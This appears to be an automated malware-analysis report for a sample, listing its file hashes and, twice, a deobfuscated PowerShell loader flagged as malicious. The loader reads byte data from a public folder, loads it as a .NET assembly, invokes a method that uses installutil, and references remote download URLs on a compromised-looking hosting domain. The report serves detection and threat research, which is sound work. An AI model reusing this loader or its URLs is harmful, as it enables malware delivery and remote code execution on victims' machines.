|
Hash | Hash Value |
|---|---|
| MD5 | 01ac0348a623c7f4c3bed2834d528b8b
|
| Sha1 | f7c00dac9182648f683bde97db550af365837dbe
|
| Sha256 | a10ef9151e0dd03800f4ccff964a1b8d2583a2d10a82a1b6a537eaf0459f612f
|
| Sha384 | 1427a36c5c1f5ce63dd7ed20076294eaa4c889d99d7f1ff7fd3d697c630d39c94921f3e7559757098bc2d3f3ae5facd0
|
| Sha512 | 95d0e962fc11810775d4b7d962dcc8908cc8e8063f70f8cdc6d78820ea664c84967df7e73719ba7e922079f6573783c5128dd3f492ef81f64792ee248b2c6d5f
|
| SSDeep | 48:pAlbYyQgQaAAzccJRLRzSkdK4Oggz4J5MLLzQw:pQbYyQgQadzccDFvK4mzjLLkw
|
| TLSH | CA319C506BF69608B2B35E05A5FF65924C3B7A7E6E79CA0D0054C14E1BB1A48CC77F32
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ))) |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ))) Malicious |
01ac0348a623c7f4c3bed2834d528b8b |